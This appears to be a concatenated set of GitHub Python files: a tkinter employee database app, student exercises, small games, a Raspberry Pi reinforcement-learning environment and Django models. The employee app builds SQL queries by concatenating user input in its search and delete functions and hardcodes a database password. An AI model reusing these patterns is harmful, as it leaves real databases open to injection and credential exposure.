file_writer.write(data)\n\n\n","repo_name":"wzzanthony/2021Fall_CS520","sub_path":"assignment1/final_project/find_path_saved.py","file_name":"find_path_saved.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"13378716878","text":"from tkinter import *\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import messagebox\nimport psycopg2\n\n \n\ndef update(rows):\n tree.delete(*tree.get_children())\n for i in rows:\n tree.insert('', 'end', values=i)\n\ndef search():\n if q.get() == '':\n messagebox.showerror('Ooops!', 'Please input text to search!')\n return\n q2 = q.get()\n query = \"Select employee_id, employee, branch, designation FROM tree WHERE employee LIKE '%\"+q2+\"%' OR branch LIKE '%\"+q2+\"%' OR designation LIKE '%\"+q2+\"%'\"\n cur.execute(query)\n rows = cur.fetchall()\n update(rows)\n\ndef clear_text():\n query = \"Select employee_id, employee, branch, designation FROM tree\"\n cur.execute(query)\n rows = cur.fetchall()\n ent1.delete(0, END)\n update(rows)\n\ndef getrow(event):\n rowid = tree.identify_row(event.y)\n item = tree.item(tree.focus())\n e1.set(item['values'][0])\n e2.set(item['values'][1])\n e3.set(item['values'][2])\n e4.set(item['values'][3])\n\n\ndef update_employee():\n if e1.get() == '' or e2.get() == '' or e3.get() == '' or e4.get() == '':\n messagebox.showerror('Ooops!', 'Please select an employee you want to update!')\n return\n employee_id = e1.get()\n employee = e2.get()\n branch = e3.get()\n designation = e4.get()\n if messagebox.askyesno(\"Confirm Please\", \"Are you sure you want to update this employee?\"):\n query = \"UPDATE tree SET employee = %s, branch = %s, designation = %s WHERE employee_id = %s\"\n cur.execute(query, (employee, branch, designation, employee_id))\n clear_text()\n conn.commit()\n else:\n return True\n\ndef add_employee():\n if e1.get() == '' or e2.get() == '' or e3.get() == '' or e4.get() == '':\n messagebox.showerror('Ooops!', 'Please input all fields !')\n return\n employee_id = e1.get()\n employee = e2.get()\n branch = e3.get()\n designation = e4.get()\n query = \"INSERT INTO tree(employee_id, employee, branch, designation) VALUES (%s, %s, %s, %s)\"\n cur.execute(query, (employee_id, employee, branch, designation))\n clear_text()\n conn.commit()\n return True\n\n\n\ndef delete_employee():\n if e1.get() == '' or e2.get() == '' or e3.get() == '' or e4.get() == '':\n messagebox.showerror('Ooops!', 'Please choose employee you want to delete!')\n return\n employee_id = e1.get()\n if messagebox.askyesno(\"Confirm Delete?\", \"Are you sure you want to delete this employee?\"):\n query = \"DELETE FROM tree WHERE employee_id = \" +employee_id\n cur.execute(query)\n conn.commit()\n clear_text()\n else:\n return True\n \n\n \nconn = psycopg2.connect(\n host = \"localhost\" , \n database = \"sample\",\n user = \"postgres\",\n password = \"windel1325\")\n\n\ncur = conn.cursor()\n\nwin = Tk()\nwin.configure(bg='grey')\nq= StringVar()\ne1= StringVar()\ne2= StringVar()\ne3= StringVar()\ne4= StringVar()\n\n\nwrapper1 = LabelFrame(win, text= \"Employee List\")\nwrapper2 = LabelFrame(win, text= \"Search\")\nwrapper3 = LabelFrame(win, text=\"Employee Data\")\n\nwrapper1.pack(fill=\"both\", expand=\"yes\", padx=20, pady=10)\nwrapper2.pack(fill=\"both\", expand=\"yes\", padx=20, pady=10)\nwrapper3.pack(fill=\"both\", expand=\"yes\", padx=20, pady=10)\n\ntree_scroll = Scrollbar(wrapper1)\ntree_scroll.pack(side=RIGHT, fill=Y)\n\ntree = ttk.Treeview(wrapper1, columns=(1,2,3,4), show=\"headings\", height=\"6\", yscrollcommand=tree_scroll.set)\ntree.pack()\n\ntree_scroll.configure(command=tree.yview)\n\ntree.heading(1, text=\"Employee ID\")\ntree.heading(2, text=\"Employee Name\")\ntree.heading(3, text=\"Branch\")\ntree.heading(4, text=\"Designation\")\n\ntree.bind('', getrow)\n\nquery = \"Select employee_id, employee, branch, designation from tree\"\ncur.execute(query)\nrows = cur.fetchall()\nupdate(rows)\n\n\nlabel1 = Label(wrapper2, text=\"Search\")\nlabel1.pack(side=tk.LEFT, padx=10)\nent1 = Entry(wrapper2, textvariable=q)\nent1.pack(side=tk.LEFT, padx=6)\nbutton1 = Button(wrapper2, text=\"Search\", command=search)\nbutton1.pack(side=tk.LEFT, padx=6)\nbutton2 = Button(wrapper2, text=\"Clear Search\", command=clear_text)\nbutton2.pack(side=tk.LEFT, padx=6)\n\nlabel2 = Label(wrapper3, text=\"Employee ID\")\nlabel2.grid(row=0, column=0, padx=5, pady=3)\nent2 = Entry(wrapper3, textvariable=e1)\nent2.grid(row=0, column=1, padx=5, pady=3)\n\nlabel3 = Label(wrapper3, text= \"Employee Name\")\nlabel3.grid(row=1, column=0, padx=5, pady=3)\nent3 = Entry(wrapper3, textvariable=e2)\nent3.grid(row=1, column=1, padx=5, pady=3)\n\nlabel4 = Label(wrapper3, text= \"Branch\")\nlabel4.grid(row=2, column=0, padx=5, pady=3)\nent4 = Entry(wrapper3, textvariable=e3)\nent4.grid(row=2, column=1, padx=5, pady=3)\n\nlabel5 = Label(wrapper3, text= \"Designation\")\nlabel5.grid(row=3, column=0, padx=5, pady=3)\nent5 = Entry(wrapper3, textvariable=e4)\nent5.grid(row=3, column=1, padx=5, pady=3)\n\nbtn_update = Button(wrapper3, text=\"Update\", command=update_employee)\nbtn_add = Button(wrapper3, text=\"Add New\", command=add_employee)\nbtn_delete = Button(wrapper3, text=\"Delete\", command=delete_employee)\n\nbtn_add.grid(row=4,column=0, padx=5, pady=3)\nbtn_update.grid(row=4, column=1, padx=5, pady=3)\nbtn_delete.grid(row=4, column=2, padx=5, pady=3)\n\n\n\n\n\n\n\n\n\nwin.title(\"Employee Table\")\nwin.geometry(\"800x700\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nwin.mainloop()\n","repo_name":"windelsalazar/sample","sub_path":"treeview.py","file_name":"treeview.py","file_ext":"py","file_size_in_byte":5304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"69890291746","text":"import numpy as np\n\n\ndef inputMatrix():\n m = []\n n = input()\n for i in range(0, int(n[0])):\n s = input()\n row = []\n for j in s.split():\n if j.isdigit() == True:\n row.append(int(j))\n m.append(row)\n return m\n\n\ndef multiMatrix(m1, m2):\n array1 = np.array(m1)\n array2 = np.array(m2)\n result = np.dot(array1, array2)\n r = result.tolist()\n return r\n\n\ndef printMatrix(m):\n # your code\n for i in range(0, len(m)):\n for j in range(0, len(m[i])):\n if j != len(m[i]) - 1:\n print(m[i][j], end=\" \")\n else:\n print(m[i][j], end=\"\")\n if i != len(m) - 1:\n print()\n\n\nn1 = input()\nm1 = inputMatrix()\nm2 = inputMatrix()\n\nmm = multiMatrix(m1, m2)\nprintMatrix(mm)\n","repo_name":"kaminokokoro/https---github.com-kaminokokoro-programming-for-data-science","sub_path":"week2/MultiMatrix.py","file_name":"MultiMatrix.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"26233710474","text":"from collections import deque\n\nN, K = map(int, input().split())\n\ndeq = deque([i for i in range(1, N+1)])\n\nans = []\nwhile len(deq) != 0:\n for _ in range(K-1):\n #k-1번째 노드까지 deq 맨 뒤로 이동\n deq.append(deq.popleft())\n #k번째 노드 삭제 후 결과에 추가\n ans.append(str(deq.popleft()))\n\nprint('<'+', '.join(ans)+'>')\n","repo_name":"SESAC2023/jooyoung_song","sub_path":"BOJ/20. 큐, 덱/11866.py","file_name":"11866.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"3160531372","text":"import gym\nfrom gym import error, spaces, utils\nimport numpy\nimport time\nimport os\nimport RPi.GPIO as gpio\n\n\nclass LineFollowerEnv(gym.Env):\n\n def __init__(self):\n gym.Env.__init__(self)\n\n gpio.setmode(gpio.BCM)\n gpio.setup(19, gpio.OUT) # Left motor\n gpio.setup(26, gpio.OUT) # Right motor\n\n gpio.setup(16, gpio.IN) # Left sensor\n gpio.setup(20, gpio.IN) # Middle sensor\n gpio.setup(21, gpio.IN) # Right sensor\n \n self.observation_space = spaces.MultiBinary(3)\n\n self.action_space = spaces.Discrete(3)\n\n self.actions = [] \n\n def right_turn():\n gpio.output(19, 1)\n time.sleep(0.4)\n gpio.output(19, 0)\n\n def left_turn():\n gpio.output(21, 1)\n time.sleep(0.4)\n gpio.output(21, 0)\n \n def straight():\n gpio.output(21, 1)\n gpio.output(19, 1)\n time.sleep(0.4)\n gpio.output(21, 0)\n gpio.output(19, 0)\n \n self.actions.append(left_turn()) # Right motor on\n self.actions.append(straight()) # Both motors on\n self.actions.append(right_turn()) # Left motor on\n\n self.reset()\n\n def reset(self):\n\n self.observation = None\n self.reward = 0.0\n self.done = False\n self.info = {}\n\n time.sleep(10)\n self.observation = self._update_observation()\n return self.observation\n\n def step(self, action):\n \n self.actions[action]\n self.done = False\n self.reward = 0.0\n\n self.observation = self._update_observation()\n\n if str(self.observation) == \"[0. 1. 0.]\":\n self.reward = 1\n elif str(self.observation) == \"[1. 1. 1.]\":\n self.reward = -0.5 \n elif str(self.observation) == \"[1. 1. 0.]\":\n self.reward = 0.8\n elif str(self.observation) == \"[0. 1. 1.]\":\n self.reward = 0.8\n elif str(self.observation) == \"[1. 0. 0.]\": \n self.reward = 0.4\n elif str(self.observation) == \"[0. 0. 1.]\": \n self.reward = 0.4\n else:\n self.reward = -1\n \n return self.observation, self.reward, self.done, self.info\n \n def render(self):\n pass\n \n def _update_observation(self):\n \n observation = numpy.zeros(3)\n \n if gpio.input(16) == 1:\n print(\"LEFT\")\n observation[0] = 1 \n if gpio.input(20) == 1:\n print(\"MIDDLE\")\n observation[1] = 1\n if gpio.input(21) == 1:\n print(\"RIGHT\")\n observation[2] = 1\n print(observation)\n\n return observation\n ","repo_name":"Kapitalisti666/Future_IoT_Technologies_project","sub_path":"scripts/linefollower_env_raspberry.py","file_name":"linefollower_env_raspberry.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"70590980386","text":"import tkinter\nfrom tkinter import Frame, Canvas\nimport PIL\nfrom PIL import Image, ImageTk, ImageDraw\n\nwidth = 200\nheight = 200\n\nif __name__ == \"__main__\":\n root = tkinter.Tk()\n\n frame = Frame(root, bd=2, relief=tkinter.SUNKEN, width=width, height=height)\n frame.grid_rowconfigure(0, weight=1)\n frame.grid_columnconfigure(0, weight=1)\n canvas = Canvas(frame, bd=0, width=width, height=height)\n canvas.grid(row=0, column=0)\n frame.pack(fill=tkinter.BOTH, expand=1)\n\n def click(event):\n x, y = event.x, event.y\n print('click {:d} {:d}'.format(x, y))\n\n def motion(event):\n x, y = event.x, event.y\n print('motion {:d} {:d}'.format(x, y))\n\n canvas.bind(\"\", click)\n canvas.bind('', motion)\n\n img = PIL.Image.new('RGBA', (width, height))\n\n # Paint red.\n pixels = img.load()\n for y in range(height):\n for x in range(width):\n pixels[x, y] = (255, 0, 0, 255)\n\n # Draw crossed white lines.\n draw = ImageDraw.Draw(img)\n draw.line((0, 0) + img.size, fill=128)\n draw.line((0, img.size[1], img.size[0], 0), fill=128)\n\n pi = PIL.ImageTk.PhotoImage(img)\n sprite = canvas.create_image(100, 100, image=pi)\n canvas.update()\n\n root.mainloop()\n","repo_name":"LennMars/icfpc2017","sub_path":"sample/tkinter_sample.py","file_name":"tkinter_sample.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"17741089881","text":"import pygame\nimport math\nfrom pygame.locals import *\n\n\nclass Bomb(pygame.sprite.Sprite):\n\n def __init__(self, screen_size, imageFile, scale, name, posx, posy, damage, max_speed):\n # Définit les éléments de sprite:\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(imageFile)\n self.rect = self.image.get_rect()\n\n # Mise à l'échelle du sprite:\n self.new_scale = (round(self.rect.width * scale * 1.09),\n round(self.rect.height * scale * 1.09))\n self.image = pygame.transform.scale(self.image, self.new_scale)\n self.rect = self.image.get_rect()\n\n # Nom du Projectile:\n self.name = name\n\n # Taille de l'écran:\n self.screen_w, self.screen_h = screen_size\n\n # Définit la position initiale:\n self.rect.x = posx\n self.rect.y = posy\n\n # Définit la vitesse initiale et l'angle, startx et starty:\n self.speed = 0\n self.angle = 0\n self.startx = 0\n self.starty = 0\n\n # Définit le mouvement:\n self.moving = False\n\n # Définit le temps:\n self.time = 0\n\n # Définit les dégâts:\n self.damage = damage\n\n # Définit la vitesse maximale du projectile\n self.maxSpeed = max_speed\n\n def move(self):\n # Calcule Vx:\n velocity_x = math.cos(math.radians(self.angle)) * self.speed\n # Calcule Vy\n velocity_y = math.sin(math.radians(self.angle)) * self.speed\n\n # Calcule la distance totale parcourue sur l'axe X:\n distance_x = velocity_x * self.time\n # Calcule la distance totale parcourue sur l'axe Y:\n distance_y = (velocity_y * self.time) + ((-9.81 * (self.time ** 2)) / 2)\n\n # Calcule la nouvelle coordonnée sur l’axe X:\n new_x = round(self.startx + distance_x)\n # Calcule la nouvelle coordonnée sur l’axe Y:\n new_y = round(self.starty - distance_y)\n\n # Ajoute à la durée d'objet:\n self.time += 0.1\n\n # Vérifie si l'image de l'objet est au-dessus du bas de la fenêtre, le cas échéant:\n if new_y <= self.screen_h - self.rect.height\\\n and new_x >= 0\\\n and new_x <= self.screen_w - self.rect.width:\n self.rect.x = new_x\n self.rect.y = new_y\n else:\n self.moving = False\n self.time = 0\n self.rotate_angle = 0\n self.rect.y = self.screen_h - self.rect.height\n\n def stop_movement(self):\n # Arrête le mouvement du sprite et réinitialise ses attributs:\n self.moving = False\n self.time = 0\n self.rotate_angle = 0\n self.rect.y = self.screen_h - self.rect.height\n\n def reset_stats(self):\n # Arrête le mouvement du sprite et réinitialise ses attributs:\n self.moving = False\n self.time = 0\n self.rotate_angle = 0\n self.rect.x = 0\n self.rect.y = 0\n\n def update(self):\n if self.moving == True: # Vérifie si la balle est en mouvement, si oui:\n self.move() # Déplace la balle une fois\n","repo_name":"alexxandre80/Projet_Python","sub_path":"class_bomb.py","file_name":"class_bomb.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"74604006627","text":"import turtle\nimport os\n\n# Global Variables\nis_paused = True\n\nwn = turtle.Screen()\nwn.title(\"PLAY PONG\")\nwn.bgcolor(\"black\")\nwn.setup(width=800, height=600)\nwn.tracer(0)\n\n# Score\nscore_a = 0\nscore_b = 0\n\n# Paddle A\npaddle_a = turtle.Turtle()\npaddle_a.speed(0)\npaddle_a.shape(\"square\")\npaddle_a.color(\"white\")\npaddle_a.shapesize(stretch_wid=5, stretch_len=1)\npaddle_a.penup()\npaddle_a.goto(-350, 0)\n\n# Paddle B\npaddle_b = turtle.Turtle()\npaddle_b.speed(0)\npaddle_b.shape(\"square\")\npaddle_b.color(\"white\")\npaddle_b.shapesize(stretch_wid=5, stretch_len=1)\npaddle_b.penup()\npaddle_b.goto(350, 0)\n\n# Ball\nball = turtle.Turtle()\nball.speed(0)\nball.shape(\"circle\")\nball.color(\"blue\")\nball.penup()\nball.goto(0, 0)\nball.dx = 0.2\nball.dy = 0.2\n\n# Pen\npen = turtle.Turtle()\npen.speed(0)\npen.color(\"white\")\npen.penup()\npen.hideturtle()\npen.goto(0, 260)\npen.write(\"Press SPACE KEY to start\",align=\"center\", font=(\"Courier\",24,\"normal\"))\npen.write(f\"Player A : 0 Player B : 0\", align=\"center\", font=(\"Courier\", 24, \"normal\"))\n\nstart_button = turtle.Turtle()\nstart_button.speed(0)\nstart_button.color(\"white\")\nstart_button.penup()\nstart_button.hideturtle()\nstart_button.goto(0, -50) # Position the button below the score display\nstart_button.write(\"Start\", align=\"center\", font=(\"Courier\", 24, \"normal\"))\n\n# List of ball colors\nball_colors = [\"blue\", \"red\", \"green\", \"yellow\", \"orange\"]\ncurrent_color_index = 0\n\n# Functions\ndef toggle_pause():\n global is_paused\n is_paused = not is_paused\n\ndef reset_positions():\n paddle_a.goto(-350, 0)\n paddle_b.goto(350, 0)\n ball.goto(0, 0)\n\n# Add a function to reset the game\ndef reset_game():\n global score_a, score_b\n score_a = 0\n score_b = 0\n reset_positions()\n pen.clear()\n pen.write(\"Player A : {} Player B : {}\".format(score_a, score_b), align=\"center\", font=(\"Courier\", 24, \"normal\"))\n\ndef start_game():\n global is_paused\n is_paused = False\n pen.clear()\n start_button.clear()\n \ndef paddle_a_up():\n if (paddle_a.ycor() > 239):\n return\n else:\n y = paddle_a.ycor()\n y += 20\n paddle_a.sety(y)\n\ndef paddle_a_down():\n if (paddle_a.ycor() < -239):\n return\n else:\n y = paddle_a.ycor()\n y -= 20\n paddle_a.sety(y)\n\ndef paddle_b_up():\n if (paddle_b.ycor() > 239):\n return\n else:\n y = paddle_b.ycor()\n y += 20\n paddle_b.sety(y)\n\ndef paddle_b_down():\n if (paddle_b.ycor() < -239):\n return\n else:\n y = paddle_b.ycor()\n y -= 20\n paddle_b.sety(y)\n\ndef start_button_click(x, y):\n if -40 < x < 40 and -80 < y < -20:\n start_game()\n\n# Keyboard binding\nwn.listen()\nwn.onkeypress(paddle_a_up, \"w\")\nwn.onkeypress(paddle_a_down, \"s\")\nwn.onkeypress(paddle_b_up, \"Up\")\nwn.onkeypress(paddle_b_down, \"Down\")\nwn.onkeypress(toggle_pause, \"p\")\nwn.onkeypress(reset_game, \"r\")\nwn.onkeypress(start_game, \"space\")\nwn.onclick(start_button_click)\n\n# Call reset_game function to initialize the game\nreset_game()\n\n# Main game loop\nwhile True:\n wn.update()\n\n if not is_paused:\n # Move the ball\n ball.setx(ball.xcor() + ball.dx)\n ball.sety(ball.ycor() + ball.dy)\n\n # Border Checking\n if ball.ycor() > 290:\n ball.sety(290)\n ball.dy *= -1\n current_color_index = (current_color_index + 1) % len(ball_colors)\n ball.color(ball_colors[current_color_index])\n\n if ball.ycor() < -290:\n ball.sety(-290)\n ball.dy *= -1\n current_color_index = (current_color_index + 1) % len(ball_colors)\n ball.color(ball_colors[current_color_index])\n\n if ball.xcor() > 390:\n ball.goto(0, 0)\n ball.dx *= -1\n score_a += 1\n pen.clear()\n pen.write(\"Player A : {} Player B : {}\".format(score_a, score_b), align=\"center\", font=(\"Courier\", 24, \"normal\"))\n current_color_index = (current_color_index + 1) % len(ball_colors)\n ball.color(ball_colors[current_color_index])\n\n if ball.xcor() < -390:\n ball.goto(0, 0)\n ball.dx *= -1\n score_b += 1\n pen.clear()\n pen.write(\"Player A : {} Player B : {}\".format(score_a, score_b), align=\"center\", font=(\"Courier\", 24, \"normal\"))\n current_color_index = (current_color_index + 1) % len(ball_colors)\n ball.color(ball_colors[current_color_index])\n\n # Paddle and ball collision\n if (ball.xcor() > 340 and ball.xcor() < 350) and (ball.ycor() < paddle_b.ycor() + 50 and ball.ycor() > paddle_b.ycor() - 50):\n ball.setx(340)\n ball.dx *= -1\n current_color_index = (current_color_index + 1) % len(ball_colors)\n ball.color(ball_colors[current_color_index])\n\n if (ball.xcor() < -340 and ball.xcor() > -350) and (ball.ycor() < paddle_a.ycor() + 50 and ball.ycor() > paddle_a.ycor() - 50):\n ball.setx(-340)\n ball.dx *= -1\n current_color_index = (current_color_index + 1) % len(ball_colors)\n ball.color(ball_colors[current_color_index])","repo_name":"Vadi26/se-pygame","sub_path":"Pong.py","file_name":"Pong.py","file_ext":"py","file_size_in_byte":5123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"1240452345","text":"#Open data and read it as a list of float numbers\ndata = open(\"E:\\data.txt\").read() #open and read as a string\ntex= data.replace(\"\\n\" , \" \") #replacing the newlines with spaces\ntext = data.replace(\",\" , \" \") #replacing the commas with spaces\nlst_data = text.split() #converting a string to a list of strings\nlst = []\nfor index in lst_data: #taking each index of above list and converting to a float\n lst.append(float(index)) #and appending to a new list\n\n\n#first Question: calculating the durations\nduration_list = []\nfor i in range(len(lst)-1): # to solve the error of out of range index since there is\n elements = lst[i+1]-lst[i] # only one data in the end of the list\n duration_list.append(elements) # append the durations to a new list\n\n\n#constructing a description string\ndescription_list = [] #initializing a description list\ndescription = \"\" #initializing a string variable\nfor durations in duration_list:\n if durations < 700:\n description_list.append(\"S\")\n elif durations > 800:\n description_list.append(\"L\") #appending string to the description list\n else:\n description_list.append(\"M\")\nfor i in description_list:\n description = description + i #converting the list of strings to a string\nprint(description)\n\n\ndef func(event, string):\n new_lst = []\n for element in range(len(string)):\n if string[element:element + (len(event))] == event:\n new_lst.append(element)\n return new_lst\n\n\nevent_dict = list()\nfor event in [\"LSL\", \"LSSL\", \"LSSSL\", \"LSSSSL\"] :\n event_dict.append((event, func(event, description)))\n\nprint(event_dict)\n\n\n\n\n\n\n","repo_name":"solmazahmadi/ChallangeOne","sub_path":"duration.py","file_name":"duration.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"40075667531","text":"import random\n#Welcome\nprint(\"Welcome to the Rock,Paper,Scissor Game\\n\\t Are you ready?(y/n)\")\nready=input(\"\\t\")\nif ready=='y':\n print(\"\\tGreat! Here we go..........\\n\\tEnter your name:\")\n name=input(\"\\t\")\n if len(name)<3:\n print(\"Enter a valid name! :(\")\n name=input(\"\\tEnter your name:\\n\\t\")\n if len(name)<3:\n print(\"Entered invalid name! :(\\n*****Sorry try later*****\")\n exit(0)\n else:\n print(\"Welcome \\\"\" +name+\"\\\" Good to see you\") \nelse:\n print(\":| Okay, see you soon\")\n exit(0)\n#Section after name\nprint(\"Select '1' if you know how to play\\nSelect '2' if you don't know how to play\")\nknow=int(input())\nif know==2:\n print('''This how to play:\\nPress following keys:\\nr --> Rock(r)\\np --> Paper(p)\\ns --> Scissor(s)''')\nelse:\n print('Hmmm, it seems you know the how to play:')\n######game functions######\ndef start(): \n print(\"\\t***The Game begins:***\")\n print(\"Computer's turn\\n select hidden :)))\")\n r=random.randint(1,3)#comp turn\n if r==1:\n comp='r'\n elif r==2:\n comp='p'\n elif r==3:\n comp='s'\n\n you=input(\"Your turn:\\n\")\n p=game(comp,you)\n print(f\"Computer select:{comp}\\nYou select:{you}\")\n result=gamewin(p)\n again=input(\"Want to play again?(y/n)\")\n if again=='y':\n return start()\n else:\n print(\"Ok! See you later\")\n exit(0)\ndef game(comp,you):\n if comp==you:\n return None\n elif comp == 'r':\n if you == 'p':\n return True\n elif you == 's':\n return False\n elif comp == 'p':\n if you == 's':\n return True\n elif you == 'r':\n return False\n elif comp == 's':\n if you == 'r':\n return True\n elif you == 'p':\n return False\n\ndef gamewin(p):\n if p== None:\n print(\"The game is tie :|\")\n elif p:\n print(\"Congratulations! You won :)\")\n else:\n print(\"Sorry! You Loss :(\")\n\n\n\nstart()\n","repo_name":"Smit-D/stone-paper-scissor-game","sub_path":"sps.py","file_name":"sps.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"16066373887","text":"from tree import Node\n\ndef checkPerfectUtil(root, leafLevel, lvl):\n if root.left is None and root.right is None:\n return lvl == leafLevel\n if root.left is None or root.right is None:\n return False\n return checkPerfectUtil(root.left, leafLevel, lvl + 1) and checkPerfectUtil(root.right, leafLevel, lvl + 1)\n\ndef checkPerfectBinaryTree(root):\n if root is None:\n return True\n level = 0\n current = root\n while current.left:\n level += 1\n current = current.left\n return checkPerfectUtil(root, level, 0)\n\n'''\n 1\n / \\\n 2 3\n / \\ / \\\n 4 5 6 7\n'''\nroot = Node(8)\n\nroot.left = Node(3)\nroot.right = Node(10)\n\n\nroot.left.left = Node(1)\nroot.left.right = Node(16)\nroot.right.left = Node(11)\nroot.right.right = Node(14)\n\n\nroot.left.left.left = Node(12)\nroot.left.left.right = Node(20)\nroot.left.right.left = Node(4)\nroot.left.right.right = Node(7)\nroot.right.left.left = Node(13)\nroot.right.left.right = Node(11)\nroot.right.right.left = Node(19)\nroot.right.right.right = Node(2)\n\n\nprint(checkPerfectBinaryTree(root))\n\n","repo_name":"embydextrous/Interview","sub_path":"binarytree/checkingPrinting/6-checkPerfectBinaryTree.py","file_name":"6-checkPerfectBinaryTree.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"70"}
+{"seq_id":"41918078276","text":"\"\"\"`sys` module's `stdout` and `stderr`.\"\"\"\n\nimport sys\n\nfrom _pytest.capture import CaptureFixture\n\n\ndef test_write_stdout_stderr(capsys: CaptureFixture) -> None:\n \"\"\"Write to standard out and error.\"\"\"\n sys.stdout.write(\"standard out\")\n sys.stderr.write(\"standard error\")\n\n out, err = capsys.readouterr()\n assert out == \"standard out\"\n assert err == \"standard error\"\n\n\ndef test_print_stdout_stderr(capsys: CaptureFixture) -> None:\n \"\"\"Print to standard out and error.\"\"\"\n print(\"standard out\")\n print(\"standard error\", file=sys.stderr)\n\n out, err = capsys.readouterr()\n assert out == \"standard out\\n\"\n assert err == \"standard error\\n\"\n","repo_name":"jashburn8020/the-python-tutorial","sub_path":"src/ch10/sys_stdout_stderr_test.py","file_name":"sys_stdout_stderr_test.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"17522376813","text":"from django.db import models\nfrom .utils import unique_slug_generator,jcal,Shortner\nfrom django.db.models.signals import pre_save\nfrom ckeditor.fields import RichTextField\nfrom ckeditor_uploader.fields import RichTextUploadingField\nimport random\nfrom django.db.models import Q\nimport os\nfrom django.utils import timezone\nfrom django.utils.html import format_html\nfrom django.core.files.storage import FileSystemStorage\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom root import settings\nfrom django.contrib.auth.models import AbstractBaseUser,BaseUserManager\n\nclass MyUserManager(BaseUserManager):\n def create_user(self, email, password=None):\n if not email:\n raise ValueError('Users must have an email address')\n\n user = self.model(\n email=self.normalize_email(email),\n )\n user.set_password(password)\n user.save(using=self._db)\n return user\n\n\nclass User(AbstractBaseUser):\n email = models.CharField(max_length = 250,unique=True)\n lastname = models.CharField(max_length = 150 , blank=True)\n firstname = models.CharField(max_length = 150 , blank=True)\n profile_img = models.ImageField(upload_to='Users/Profile/' , blank=True)\n create_time = models.DateTimeField(auto_now=True)\n active = models.BooleanField(default=True)\n submit_email = models.BooleanField(default=False)\n \n objects = MyUserManager()\n #REQUIRED_FIELDS = ['lastname','firstname']\n USERNAME_FIELD = 'email'\n def __str__(self):\n return f\"Email : {self.email} ID : {self.id}\"\n\n def has_perm(self, perm, obj=None):\n return True\n \n def has_module_perms(self, app_label):\n return True\n \n def fullname(self):\n name = self.lastname + self.firstname\n return name\n \n class Meta:\n verbose_name = 'User'\n verbose_name_plural = 'Users'\n\n\ntemplatefs = FileSystemStorage(location='cms/templates/page/')\n\n# Create your models here.\n\nclass pwsrest(models.Model):\n email = models.CharField(max_length=150)\n uuid=models.CharField(max_length=250,unique=True)\n status = models.BooleanField(default=False)\n date = models.DateField(default=timezone.now) \n time = models.TimeField(default=timezone.now)\n def __str__(self):\n return self.email\n class Meta:\n verbose_name = 'pwsrest'\n verbose_name_plural = 'pwsrest'\n\n################################Blog model#############################\n\n\n\n\n\n\n\n\n#####blog manager to customize queries\nclass BlogManager(models.Manager):\n ####search\n def search(self,q):\n lookup = Q(title__icontains=q) | Q(body__icontains=q) | Q(my_tags__title__icontains=q)\n if len(lookup) > 0:\n return self.get_queryset().filter(lookup,active=True).distinct()\n else:\n return None\n\n\n\n def active_Blogs(self):\n qs=self.get_queryset().filter(active=True)\n if qs.count() >= 1:\n return qs\n else:\n return None\n \n \n def get_by_slug(self,slug):\n qs=self.get_queryset().filter(active=True,slug=slug)\n if qs.count() == 1:\n return qs\n else:\n return None\n\n\n######blog image url maker\ndef get_filename_ext(filepath):\n base_name = os.path.basename(filepath)\n name, ext = os.path.splitext(base_name)\n return name, ext\n\n\ndef upload_image_path(instance, filename):\n new_name = random.randint(1, 27634723542)\n name, ext = get_filename_ext(filename)\n # final_name = f\"{new_name}{ext}\"\n final_name = f\"{instance.id}-{instance.title}{ext}\"\n return f\"blog/{final_name}\"\n\n\n\n\n##################################blog tag model###########################################3\nclass Tag(models.Model):\n title=models.CharField(max_length=150)\n slug=models.SlugField(blank=True)\n date=models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.title\n\n\n\n\n\ndef tag_save(sender, instance, *args, **kwargs):\n if not instance.slug:\n instance.slug = unique_slug_generator(instance)\n\npre_save.connect(tag_save,sender=Tag)\n\n################cat model#############################################\nclass Category(models.Model):\n title=models.CharField(max_length=150)\n slug=models.SlugField(blank=True)\n date=models.DateTimeField(auto_now_add=True)\n parent=models.ForeignKey('self',default=None,null=True,blank=True,on_delete=models.CASCADE,related_name='parents_cat')\n\n def __str__(self):\n return self.title\n\ndef category_save(sender, instance, *args, **kwargs):\n if not instance.slug:\n instance.slug = unique_slug_generator(instance)\n\npre_save.connect(category_save,sender=Category)\n\n\n\n\n#################################################################################\n########BLOG main model##########################################################################\n#################################################################################\nclass Blog(models.Model):\n title=models.CharField(max_length=150,unique=True)\n slug=models.SlugField(blank=True, unique=True)\n body=RichTextUploadingField(blank=True,null=True)\n image=models.ImageField(upload_to=upload_image_path, null=True, blank=True)\n active=models.BooleanField(default=False)\n publish_time = models.DateTimeField(default=timezone.now)\n created_time = 